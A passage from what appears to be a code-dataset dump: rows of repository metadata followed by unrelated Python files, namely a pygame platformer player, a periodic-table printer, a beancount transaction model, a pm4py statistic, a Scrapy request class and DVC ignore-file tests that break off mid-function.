| 27.817308 | 56 | 0.807812 | 413 | 2,893 | 5.065375 | 0.227603 | 0.054493 | 0.022945 | 0.034417 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.104044 | 2,893 | 103 | 57 | 28.087379 | 0.807099 | 0.045282 | 0 | 0 | 0 | 0 | 0.359403 | 0.070571 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
414999092001be652ff829a08dad85777592db23 | 8,098 | py | Python | source/player.py | 2nPlusOne/pygame-platformer | 69078819280506d8ab1af4c493da22eb02b4fe01 | [
"MIT"
] | null | null | null | source/player.py | 2nPlusOne/pygame-platformer | 69078819280506d8ab1af4c493da22eb02b4fe01 | [
"MIT"
] | null | null | null | source/player.py | 2nPlusOne/pygame-platformer | 69078819280506d8ab1af4c493da22eb02b4fe01 | [
"MIT"
] | null | null | null | import pygame
from settings import *
import utils
class Player(pygame.sprite.Sprite):
def __init__(self, pos, groups, collision_sprites):
super().__init__(groups)
self.image = pygame.Surface((TILE_SIZE / 2, TILE_SIZE))
self.image.fill(PLAYER_COLOR)
self.rect = self.image.get_rect(topleft=pos)
self.collision_sprites = collision_sprites
# Player movement
self.direction_x = 0 # -1 = left, 1 = right, 0 = none
self.velocity = pygame.math.Vector2()
self.speed = MAX_PLAYER_SPEED
# Jumping
self.jumps_remaining = MAX_JUMPS
self.is_grounded = False # Is the player on the ground?
self.was_grounded = False # Used to determine if the player has left the ground this frame
self.is_jumping = False # Is the player jumping?
self.jump_pressed = False # Is the jump key currently pressed?
self.jumping_locked = False # Used to lock the player from jumping again until they release the jump key
self.current_gravity = 0 # The current gravity affecting the player
self.jump_gravity = (2 * MAX_JUMP_HEIGHT) / (TIME_TO_JUMP_APEX ** 2)
self.fall_gravity = self.jump_gravity * FALL_GRAVITY_MULTIPLIER
self.jump_velocity = ((-2 * MAX_JUMP_HEIGHT) / TIME_TO_JUMP_APEX) - self.fall_gravity
# Time
self.coyote_timer = COYOTE_TIME # Time the player has to jump after leaving the ground
self.jump_buffer_timer = JUMP_BUFFER_TIME # Registers jump input as long as this is less than JUMP_BUFFER_TIME
self.last_frame_ticks = 0 # Not used if using estimated delta_time (1/FPS)
def process_input(self, events):
"""Process input events. This method is called by Level, which passes in the events from the main game loop."""
for event in events:
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_LEFT: # Move left
self.direction_x = -1
if event.key == pygame.K_RIGHT: # Move right
self.direction_x = 1
if event.key == pygame.K_UP: # Jump
self.jump_pressed = True
if event.key == pygame.K_g: # Invert gravity just for fun
self.fall_gravity = -self.fall_gravity
self.current_gravity = -self.current_gravity
if event.type == pygame.KEYUP:
if event.key == pygame.K_LEFT and self.direction_x < 0:
self.direction_x = 0
if event.key == pygame.K_RIGHT and self.direction_x > 0:
self.direction_x = 0
if event.key == pygame.K_UP:
self.jump_pressed = False
self.jumping_locked = False
def check_jump_buffer(self):
"""Conditionally applies jumping force to the player."""
self.update_jump_buffer_timer()
# jump_allowed = not (self.jumps_remaining > 0 and
# (self.is_grounded or self.is_jumping or
# self.coyote_timer < COYOTE_TIME))
jump_input = self.jump_buffer_timer < JUMP_BUFFER_TIME
can_jump = not self.jumping_locked and self.jumps_remaining > 0 and (
self.is_jumping or self.coyote_timer < COYOTE_TIME)
self.jumping_locked = self.jump_pressed
if jump_input and can_jump:
self.jump()
def jump(self):
self.coyote_timer = COYOTE_TIME
self.jump_buffer_timer = JUMP_BUFFER_TIME
self.is_jumping = True
self.jumps_remaining -= 1
self.current_gravity = self.jump_gravity
self.velocity.y = self.jump_velocity
def update_air_timer(self):
"""Resets air timer if grounded, otherwise increments by delta time."""
self.coyote_timer = 0 if self.is_grounded else round(self.coyote_timer + EST_DELTA_TIME, 2)
def update_jump_buffer_timer(self):
"""Resets jump buffer timer if jump key pressed, otherwise increments by delta time."""
self.jump_buffer_timer = 0 if self.jump_pressed and not self.jumping_locked else round(self.jump_buffer_timer + EST_DELTA_TIME, 2)
def move(self):
"""Move the player and apply collisions."""
self.velocity.y += self.current_gravity
self.check_jump_buffer() # Check if the player should jump this frame
target_velocity = pygame.math.Vector2(self.direction_x * self.speed, self.velocity.y)
self.velocity = utils.pygame_vector2_smooth_damp(self.velocity, target_velocity, SMOOTH_TIME, EST_DELTA_TIME)
self.velocity.x = 0 if abs(self.velocity.x) < 2*SMOOTH_TIME else self.velocity.x
# Horizontal movement and collisions
self.rect.x += self.velocity.x
for sprite in self.collision_sprites.sprites():
if not sprite.rect.colliderect(self.rect): continue
# Right collision
elif abs(self.rect.right - sprite.rect.left) < COLLISION_TOLERANCE and self.velocity.x > 0:
self.rect.right = sprite.rect.left
# Left collision
elif abs(self.rect.left - sprite.rect.right) < COLLISION_TOLERANCE and self.velocity.x < 0:
self.rect.left = sprite.rect.right
self.velocity.x = 0
break
# Vertical movement and collisions
# Since vertical movement can be potentially a lot faster than horizontal due to gravity,
# we need to check for collisions as we go each frame, instead of after moving by the velocity.
for i in range(abs(int(self.velocity.y))):
collided = False
self.rect.y += abs(self.velocity.y) / self.velocity.y
for sprite in self.collision_sprites.sprites():
if not sprite.rect.colliderect(self.rect): continue
# Bottom collision
elif abs(self.rect.bottom - sprite.rect.top) < COLLISION_TOLERANCE and self.velocity.y > 0:
self.rect.bottom = sprite.rect.top
# Top collision
elif abs(self.rect.top - sprite.rect.bottom) < COLLISION_TOLERANCE and self.velocity.y < 0:
self.rect.top = sprite.rect.bottom
self.velocity.y = 0
collided = True
break
if collided: break
# Set gravity to fall gravity scale if we're falling or not holding jump
if (not self.is_grounded and (not self.jump_pressed or self.velocity.y > 0)):
self.current_gravity = self.fall_gravity
def set_grounded(self):
"""Moves the player down 1 pixel and checks for a collision."""
self.rect.y += 1
for sprite in self.collision_sprites.sprites():
if sprite.rect.colliderect(self.rect):
if not abs(self.rect.bottom - sprite.rect.top) < COLLISION_TOLERANCE: continue
self.is_grounded = True
self.was_grounded = True
self.is_jumping = False
self.jumps_remaining = MAX_JUMPS
break
else:
self.is_grounded = False
left_ground_this_frame = self.was_grounded and not self.is_grounded
if not left_ground_this_frame: continue
self.air_time_start = pygame.time.get_ticks()
self.was_grounded = False
self.rect.y -= 1
def update(self):
"""Update the player."""
self.update_air_timer()
self.move()
self.set_grounded()
print(f"jumps_remaining: {self.jumps_remaining}")
print(f"jump_locked: {self.jumping_locked}")
# Zombie method, only used if I decide I need perfect delta time (should probably remove this...)
def update_delta_time(self):
"""Update the delta time."""
self.delta_time = (pygame.time.get_ticks() - self.last_frame_ticks) / 1000
self.last_frame_ticks = pygame.time.get_ticks() | 48.491018 | 138 | 0.618177 | 1,053 | 8,098 | 4.573599 | 0.177588 | 0.049834 | 0.026993 | 0.023256 | 0.336379 | 0.259759 | 0.186669 | 0.155731 | 0.135797 | 0.053987 | 0 | 0.007611 | 0.302297 | 8,098 | 167 | 139 | 48.491018 | 0.844779 | 0.206594 | 0 | 0.239669 | 0 | 0 | 0.011487 | 0.006766 | 0 | 0 | 0 | 0 | 0 | 1 | 0.082645 | false | 0 | 0.024793 | 0 | 0.115702 | 0.016529 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4149b0929f392e8e110537d2266f990d4929d8f0 | 5,054 | py | Python | periodic/table.py | moopet/pyriodic | 5477934881db6a00f040b9ff3624d1eca9389f36 | [
"MIT"
] | null | null | null | periodic/table.py | moopet/pyriodic | 5477934881db6a00f040b9ff3624d1eca9389f36 | [
"MIT"
] | null | null | null | periodic/table.py | moopet/pyriodic | 5477934881db6a00f040b9ff3624d1eca9389f36 | [
"MIT"
] | null | null | null | from colored import fg, bg, attr
from . import elements
from . import layouts
class PeriodicTableError(Exception):
"""Periodic Table exceptions."""
pass
class PeriodicTable:
"""Periodic Table."""
def __init__(self, **kwargs):
self.color = kwargs["color"] if "color" in kwargs else False
self.width = kwargs["width"] if "width" in kwargs else None
self.elements = elements.elements
self.layouts = layouts.layouts
def colorize_symbol(self, symbol, show_number=False):
"""Get a pretty version of a symbol or number."""
if symbol == " ":
return " "
symbol = symbol.lower().capitalize()
text = f" {symbol:2} "
if show_number:
number = str(self.elements[symbol]["number"])
text = f" {number:3}"
if self.color:
element_color = self.elements[symbol]["color"]
contrast_color = "white"
if element_color == "yellow":
contrast_color = "yellow_1"
background_color = bg(element_color)
text_color = fg(contrast_color) if show_number else fg("black")
reset = attr("reset")
text = f"{background_color}{text_color}{text}{reset}"
return text
def render_info(self, symbol):
"""Print summary information for a particular element."""
if symbol not in self.elements:
raise PeriodicTableError(f"Symbol not found in the periodic table")
if self.color:
self.render_symbols([symbol])
element = self.elements[symbol]
print(f"Symbol: {symbol}")
print(f"Name: {element['name']}")
if "origin" in element:
print(f"Origin of name: {element['origin']}")
print(f"Series: {element['series'].capitalize()}")
print(f"Atomic number: {element['number']}")
print(f"Period: {element['period']}")
if "group" in element:
print(f"Group: {element['group']}")
def render_table(self, layout="standard", show_grid=False):
"""Print the classic periodic table using current output
configuration."""
if layout not in self.layouts:
raise PeriodicTableError(f"Unknown table layout '{layout}'")
if show_grid:
print(" " + self.layouts[layout]["grid"])
print()
period = 1
for line in self.layouts[layout]["table"].splitlines():
line = f" {line} "
is_top_line = period == int(period)
period += 0.5
for symbol in self.elements:
replacement = self.colorize_symbol(symbol, is_top_line)
line = line.replace(f" {symbol:2} ", replacement)
if show_grid:
header = int(period) if period < 8 and is_top_line else ' '
line = f"{header} {line}"
if self.color:
reset = attr('reset')
for symbol in self.elements:
color = bg(self.elements[symbol]["color"])
pattern = f" {symbol:2} "
line = line.replace(pattern, f"{color}{pattern}{reset}")
print(line)
def render_symbols(self, symbols):
"""Print a list of symbols using current output configuration."""
columns = int(self.width / 4)
lines = [symbols[i:i + columns] for i in range(0, len(symbols), columns)]
for line in lines:
top = [self.colorize_symbol(symbol, show_number=True) for symbol in line]
bottom = [self.colorize_symbol(symbol) for symbol in line]
print("".join(top))
print("".join(bottom))
def get_solutions(self, word, recursing=False):
"""Find all permutations that can spell a word."""
if not recursing:
self.stack = []
self.results = []
word = word.lower()
for symbol in self.elements:
symbol = symbol.lower()
if symbol == word:
if self.stack not in self.results:
self.stack.append(symbol)
self.results.append(self.stack)
self.stack = self.stack[:-1]
continue
if symbol == word[:len(symbol)]:
self.stack.append(symbol)
self.get_solutions(word[len(symbol):], recursing=True)
self.stack = self.stack[:-1]
return sorted(self.results, key=self.get_solution_ranking)
def get_solution_ranking(self, solution):
"""Score a solution based on length and number of repeated symbols."""
return len(solution) + 100 * (len(solution) - len(set(solution)))
def get_symbol_from_atomic_number(self, number):
"""Translate an atomic number into an element's symbol."""
number = int(number)
elements = self.elements
matches = [e for e in elements if elements[e]["number"] == number]
return matches[0] if matches else None
| 30.630303 | 85 | 0.564899 | 580 | 5,054 | 4.843103 | 0.22931 | 0.04272 | 0.03204 | 0.01602 | 0.055892 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004928 | 0.317372 | 5,054 | 164 | 86 | 30.817073 | 0.809275 | 0.085081 | 0 | 0.118812 | 0 | 0 | 0.113786 | 0.021444 | 0 | 0 | 0 | 0 | 0 | 1 | 0.079208 | false | 0.009901 | 0.029703 | 0 | 0.178218 | 0.118812 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4149c18516a466d5bd042367b350b07706f720b8 | 536 | py | Python | data_model/transaction.py | chryoung/beancount_importer | 664d4bf07d7b953afca4cf9fce7436c942390c52 | [
"MIT"
] | 2 | 2021-08-18T14:05:46.000Z | 2021-09-24T07:44:23.000Z | data_model/transaction.py | chryoung/beancount_importer | 664d4bf07d7b953afca4cf9fce7436c942390c52 | [
"MIT"
] | 1 | 2021-09-24T08:00:26.000Z | 2021-10-07T10:45:28.000Z | data_model/transaction.py | chryoung/beancount_importer | 664d4bf07d7b953afca4cf9fce7436c942390c52 | [
"MIT"
] | null | null | null | from datetime import date
from enum import IntEnum
class TransactionDirection(IntEnum):
EXPENSES = 0
INCOME = 1
class Transaction:
def __init__(self):
self.will_import = True
self.transaction_date = date.today()
self.payee = ''
self.description = ''
self.amount = 0
self.currency = ''
self.bill_payment_account = ''
self.direction = TransactionDirection.EXPENSES
self.from_account = ''
self.to_account = ''
self.is_modified = False
| 23.304348 | 54 | 0.619403 | 56 | 536 | 5.732143 | 0.553571 | 0.102804 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007916 | 0.29291 | 536 | 22 | 55 | 24.363636 | 0.83905 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.166667 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
414dbeebee592b4e49d79aec901a1680c586b5fb | 3,617 | py | Python | ws2122-lspm/Lib/site-packages/pm4py/statistics/concurrent_activities/pandas/get.py | Malekhy/ws2122-lspm | e4dc8b801d12f862b8ef536a0f125f346f085a00 | [
"MIT"
] | 1 | 2022-01-19T04:02:46.000Z | 2022-01-19T04:02:46.000Z | ws2122-lspm/Lib/site-packages/pm4py/statistics/concurrent_activities/pandas/get.py | Malekhy/ws2122-lspm | e4dc8b801d12f862b8ef536a0f125f346f085a00 | [
"MIT"
] | 1 | 2021-11-19T07:21:48.000Z | 2021-11-19T07:21:48.000Z | ws2122-lspm/Lib/site-packages/pm4py/statistics/concurrent_activities/pandas/get.py | Malekhy/ws2122-lspm | e4dc8b801d12f862b8ef536a0f125f346f085a00 | [
"MIT"
] | 1 | 2022-01-14T17:15:38.000Z | 2022-01-14T17:15:38.000Z | '''
This file is part of PM4Py (More Info: https://pm4py.fit.fraunhofer.de).
PM4Py is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
PM4Py is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with PM4Py. If not, see <https://www.gnu.org/licenses/>.
'''
from enum import Enum
from pm4py.algo.discovery.dfg.adapters.pandas.df_statistics import get_concurrent_events_dataframe
from pm4py.util import exec_utils, constants, xes_constants
from typing import Optional, Dict, Any, Union, Tuple, List, Set
import pandas as pd
class Parameters(Enum):
ACTIVITY_KEY = constants.PARAMETER_CONSTANT_ACTIVITY_KEY
CASE_ID_KEY = constants.PARAMETER_CONSTANT_CASEID_KEY
TIMESTAMP_KEY = constants.PARAMETER_CONSTANT_TIMESTAMP_KEY
START_TIMESTAMP_KEY = constants.PARAMETER_CONSTANT_START_TIMESTAMP_KEY
STRICT = "strict"
def apply(dataframe: pd.DataFrame, parameters: Optional[Dict[Union[str, Parameters], Any]] = None) -> Dict[Tuple[str, str], int]:
"""
Gets the number of times for which two activities have been concurrent in the log
Parameters
--------------
dataframe
Pandas dataframe
parameters
Parameters of the algorithm, including:
- Parameters.ACTIVITY_KEY => activity key
- Parameters.CASE_ID_KEY => case id
- Parameters.START_TIMESTAMP_KEY => start timestamp
- Parameters.TIMESTAMP_KEY => complete timestamp
- Parameters.STRICT => Determine if only entries that are strictly concurrent
(i.e. the length of the intersection as real interval is > 0) should be obtained. Default: False
Returns
--------------
ret_dict
Dictionaries associating to a couple of activities (tuple) the number of times for which they have been
executed in parallel in the log
"""
if parameters is None:
parameters = {}
activity_key = exec_utils.get_param_value(Parameters.ACTIVITY_KEY, parameters, xes_constants.DEFAULT_NAME_KEY)
case_id_glue = exec_utils.get_param_value(Parameters.CASE_ID_KEY, parameters, constants.CASE_CONCEPT_NAME)
timestamp_key = exec_utils.get_param_value(Parameters.TIMESTAMP_KEY, parameters,
xes_constants.DEFAULT_TIMESTAMP_KEY)
start_timestamp_key = exec_utils.get_param_value(Parameters.START_TIMESTAMP_KEY, parameters, None)
strict = exec_utils.get_param_value(Parameters.STRICT, parameters, False)
concurrent_dataframe = get_concurrent_events_dataframe(dataframe, start_timestamp_key=start_timestamp_key,
timestamp_key=timestamp_key, case_id_glue=case_id_glue,
activity_key=activity_key, strict=strict)
ret_dict0 = concurrent_dataframe.groupby([activity_key, activity_key + '_2']).size().to_dict()
ret_dict = {}
# assure to avoid problems with np.float64, by using the Python float type
for el in ret_dict0:
# avoid getting two entries for the same set of concurrent activities
el2 = tuple(sorted(el))
ret_dict[el2] = int(ret_dict0[el])
return ret_dict
| 44.654321 | 129 | 0.709151 | 474 | 3,617 | 5.21308 | 0.367089 | 0.072845 | 0.048159 | 0.034399 | 0.22501 | 0.117766 | 0.049777 | 0.035613 | 0 | 0 | 0 | 0.006043 | 0.222284 | 3,617 | 80 | 130 | 45.2125 | 0.872378 | 0.431573 | 0 | 0 | 0 | 0 | 0.004169 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034483 | false | 0 | 0.172414 | 0 | 0.448276 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4151c5c3dbe7d9b634bc3106ccbd1a50caa1fb1f | 1,120 | py | Python | pipeline.py | Overnickel/eclip | 8c52160d4e4418b4b1e186f30b4e06491ada9c40 | [
"MIT"
] | null | null | null | pipeline.py | Overnickel/eclip | 8c52160d4e4418b4b1e186f30b4e06491ada9c40 | [
"MIT"
] | null | null | null | pipeline.py | Overnickel/eclip | 8c52160d4e4418b4b1e186f30b4e06491ada9c40 | [
"MIT"
] | 1 | 2020-03-05T23:58:04.000Z | 2020-03-05T23:58:04.000Z | import os
import argparse
import yaml
import pprint
from easydict import EasyDict as edict
from download import download
from read_process import read_process
from de_analysis import de
from cancer import cancer
def parse_args():
parser = argparse.ArgumentParser(description='eCLIP')
parser.add_argument('--config', dest='config_file',
help='configuration filename',
default='configs.yml', type=str)
return parser.parse_args()
def load_config(config_path):
with open(config_path, 'r') as f:
config = edict(yaml.load(f))
return config
def main():
print('ECLIP data processing pipeline.')
## load config file
args = parse_args()
if args.config_file is None:
raise Exception('no configuration file')
config = load_config(args.config_file)
pprint.PrettyPrinter(indent=2).pprint(config)
## download data
download(config)
## reads processing
read_process(config)
## differential expression analysis
de(config)
## cancer
cancer(config)
if __name__ == '__main__':
main()
| 21.960784 | 57 | 0.677679 | 136 | 1,120 | 5.411765 | 0.441176 | 0.054348 | 0.038043 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00116 | 0.230357 | 1,120 | 50 | 58 | 22.4 | 0.852668 | 0.077679 | 0 | 0 | 0 | 0 | 0.11546 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.09375 | false | 0 | 0.28125 | 0 | 0.4375 | 0.09375 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41528f11f89e17b45a8aaf9f472409371cd43c86 | 887 | py | Python | finscraper/request.py | jmyrberg/finscraper | f90399a0c33247d3bb896ca987ef6f293609abe0 | [
"MIT"
] | null | null | null | finscraper/request.py | jmyrberg/finscraper | f90399a0c33247d3bb896ca987ef6f293609abe0 | [
"MIT"
] | 24 | 2020-05-09T19:18:30.000Z | 2020-11-21T22:47:39.000Z | finscraper/request.py | jmyrberg/finscraper | f90399a0c33247d3bb896ca987ef6f293609abe0 | [
"MIT"
] | null | null | null | """Module for custom Scrapy request components."""
from scrapy import Request
class SeleniumCallbackRequest(Request):
"""Process request with given callback using Selenium.
Args:
selenium_callback (func or None, optional): Function that will be
called with the chrome webdriver. The function should take in
parameters (request, spider, driver) and return request, response
or None. If None, driver will be used for fetching the page, and
return is response. Defaults to None.
"""
def __init__(self, *args, selenium_callback=None, **kwargs):
meta = kwargs.pop('meta', {}) or {}
if 'selenium_callback' not in meta:
meta['selenium_callback'] = selenium_callback
new_kwargs = dict(**kwargs, meta=meta)
super(SeleniumCallbackRequest, self).__init__(*args, **new_kwargs)
| 36.958333 | 77 | 0.668546 | 105 | 887 | 5.504762 | 0.52381 | 0.138408 | 0.069204 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.24239 | 887 | 23 | 78 | 38.565217 | 0.860119 | 0.491545 | 0 | 0 | 0 | 0 | 0.092457 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41533ac389ddcc893deaa3a3dea233e8a8c4234c | 12,254 | py | Python | tests/func/test_ignore.py | farizrahman4u/dvc | a56c8bbab662c3792ae12aa7db6c40a42a23de50 | [
"Apache-2.0"
] | 1 | 2020-08-12T22:51:45.000Z | 2020-08-12T22:51:45.000Z | tests/func/test_ignore.py | farizrahman4u/dvc | a56c8bbab662c3792ae12aa7db6c40a42a23de50 | [
"Apache-2.0"
] | null | null | null | tests/func/test_ignore.py | farizrahman4u/dvc | a56c8bbab662c3792ae12aa7db6c40a42a23de50 | [
"Apache-2.0"
] | 1 | 2020-11-28T11:47:48.000Z | 2020-11-28T11:47:48.000Z | import os
import shutil
import pytest
from dvc.exceptions import DvcIgnoreInCollectedDirError
from dvc.ignore import (
DvcIgnore,
DvcIgnoreDirs,
DvcIgnorePatterns,
DvcIgnorePatternsTrie,
DvcIgnoreRepo,
)
from dvc.path_info import PathInfo
from dvc.repo import Repo
from dvc.tree.local import LocalRemoteTree
from dvc.utils import relpath
from dvc.utils.fs import get_mtime_and_size
from tests.dir_helpers import TmpDir
def test_ignore(tmp_dir, dvc, monkeypatch):
tmp_dir.gen({"dir": {"ignored": "text", "other": "text2"}})
tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "dir/ignored")
dvc.tree.__dict__.pop("dvcignore", None)
path = PathInfo(tmp_dir)
assert set(dvc.tree.walk_files(path / "dir")) == {path / "dir" / "other"}
def test_ignore_unicode(tmp_dir, dvc):
tmp_dir.gen({"dir": {"other": "text", "тест": "проверка"}})
tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "dir/тест")
dvc.tree.__dict__.pop("dvcignore", None)
path = PathInfo(tmp_dir)
assert set(dvc.tree.walk_files(path / "dir")) == {path / "dir" / "other"}
def test_rename_ignored_file(tmp_dir, dvc):
tmp_dir.gen({"dir": {"ignored": "...", "other": "text"}})
tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "ignored*")
dvc.tree.__dict__.pop("dvcignore", None)
mtime, size = get_mtime_and_size("dir", dvc.tree)
shutil.move("dir/ignored", "dir/ignored_new")
new_mtime, new_size = get_mtime_and_size("dir", dvc.tree)
assert new_mtime == mtime and new_size == size
def test_rename_file(tmp_dir, dvc):
tmp_dir.gen({"dir": {"foo": "foo", "bar": "bar"}})
mtime, size = get_mtime_and_size("dir", dvc.tree)
shutil.move("dir/foo", "dir/foo_new")
new_mtime, new_size = get_mtime_and_size("dir", dvc.tree)
assert new_mtime != mtime and new_size == size
def test_remove_ignored_file(tmp_dir, dvc):
tmp_dir.gen({"dir": {"ignored": "...", "other": "text"}})
tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "dir/ignored")
dvc.tree.__dict__.pop("dvcignore", None)
mtime, size = get_mtime_and_size("dir", dvc.tree)
os.remove("dir/ignored")
new_mtime, new_size = get_mtime_and_size("dir", dvc.tree)
assert new_mtime == mtime and new_size == size
def test_remove_file(tmp_dir, dvc):
tmp_dir.gen({"dir": {"foo": "foo", "bar": "bar"}})
mtime, size = get_mtime_and_size("dir", dvc.tree)
os.remove("dir/foo")
new_mtime, new_size = get_mtime_and_size("dir", dvc.tree)
assert new_mtime != mtime and new_size != size
def test_dvcignore_in_out_dir(tmp_dir, dvc):
tmp_dir.gen({"dir": {"foo": "foo", DvcIgnore.DVCIGNORE_FILE: ""}})
with pytest.raises(DvcIgnoreInCollectedDirError):
dvc.add("dir")
@pytest.mark.parametrize("dname", ["dir", "dir/subdir"])
def test_ignore_collecting_dvcignores(tmp_dir, dvc, dname):
tmp_dir.gen({"dir": {"subdir": {}}})
top_ignore_file = (tmp_dir / dname).with_name(DvcIgnore.DVCIGNORE_FILE)
top_ignore_file.write_text(os.path.basename(dname))
dvc.tree.__dict__.pop("dvcignore", None)
ignore_file = tmp_dir / dname / DvcIgnore.DVCIGNORE_FILE
ignore_file.write_text("foo")
assert len(dvc.tree.dvcignore.ignores) == 3
assert DvcIgnoreDirs([".git", ".hg", ".dvc"]) in dvc.tree.dvcignore.ignores
ignore_pattern_trie = None
for ignore in dvc.tree.dvcignore.ignores:
if isinstance(ignore, DvcIgnorePatternsTrie):
ignore_pattern_trie = ignore
assert ignore_pattern_trie is not None
assert (
DvcIgnorePatterns.from_files(
os.fspath(top_ignore_file),
LocalRemoteTree(None, {"url": dvc.root_dir}),
)
== ignore_pattern_trie[os.fspath(ignore_file)]
)
assert any(
i for i in dvc.tree.dvcignore.ignores if isinstance(i, DvcIgnoreRepo)
)
def test_ignore_on_branch(tmp_dir, scm, dvc):
tmp_dir.scm_gen({"foo": "foo", "bar": "bar"}, commit="add files")
with tmp_dir.branch("branch", new=True):
tmp_dir.scm_gen(DvcIgnore.DVCIGNORE_FILE, "foo", commit="add ignore")
dvc.tree.__dict__.pop("dvcignore", None)
path = PathInfo(tmp_dir)
assert set(dvc.tree.walk_files(path)) == {
path / "foo",
path / "bar",
}
dvc.tree = scm.get_tree("branch", use_dvcignore=True)
assert set(dvc.tree.walk_files(path)) == {
os.fspath(path / DvcIgnore.DVCIGNORE_FILE),
os.fspath(path / "bar"),
}
def test_match_nested(tmp_dir, dvc):
tmp_dir.gen(
{
".dvcignore": "*.backup\ntmp",
"foo": "foo",
"tmp": "...",
"dir": {"x.backup": "x backup", "tmp": "content"},
}
)
dvc.tree.__dict__.pop("dvcignore", None)
result = {os.fspath(os.path.normpath(f)) for f in dvc.tree.walk_files(".")}
assert result == {".dvcignore", "foo"}
def test_ignore_external(tmp_dir, scm, dvc, tmp_path_factory):
tmp_dir.gen(".dvcignore", "*.backup\ntmp")
ext_dir = TmpDir(os.fspath(tmp_path_factory.mktemp("external_dir")))
ext_dir.gen({"y.backup": "y", "tmp": "ext tmp"})
result = {relpath(f, ext_dir) for f in dvc.tree.walk_files(ext_dir)}
assert result == {"y.backup", "tmp"}
def test_ignore_subrepo(tmp_dir, scm, dvc):
tmp_dir.gen({".dvcignore": "foo", "subdir": {"foo": "foo"}})
scm.add([".dvcignore"])
scm.commit("init parent dvcignore")
dvc.tree.__dict__.pop("dvcignore", None)
subrepo_dir = tmp_dir / "subdir"
assert not dvc.tree.exists(PathInfo(subrepo_dir / "foo"))
with subrepo_dir.chdir():
subrepo = Repo.init(subdir=True)
scm.add(str(subrepo_dir / "foo"))
scm.commit("subrepo init")
for _ in subrepo.brancher(all_commits=True):
assert subrepo.tree.exists(PathInfo(subrepo_dir / "foo"))
def test_ignore_blank_line(tmp_dir, dvc):
tmp_dir.gen({"dir": {"ignored": "text", "other": "text2"}})
tmp_dir.gen(DvcIgnore.DVCIGNORE_FILE, "foo\n\ndir/ignored")
dvc.tree.__dict__.pop("dvcignore", None)
path = PathInfo(tmp_dir)
assert set(dvc.tree.walk_files(path / "dir")) == {path / "dir" / "other"}
# It is not possible to re-include a file if a parent directory of
# that file is excluded.
# Git doesn’t list excluded directories for performance reasons,
# so any patterns on contained files have no effect,
# no matter where they are defined.
@pytest.mark.parametrize(
"data_struct, pattern_list, result_set",
[
(
{"dir": {"subdir": {"not_ignore": "121"}}},
["subdir/*", "!not_ignore"],
{os.path.join("dir", "subdir", "not_ignore")},
),
(
{"dir": {"subdir": {"should_ignore": "121"}}},
["subdir", "!should_ignore"],
set(),
),
(
{"dir": {"subdir": {"should_ignore": "121"}}},
["subdir/", "!should_ignore"],
set(),
),
],
)
def test_ignore_file_in_parent_path(
tmp_dir, dvc, data_struct, pattern_list, result_set
):
tmp_dir.gen(data_struct)
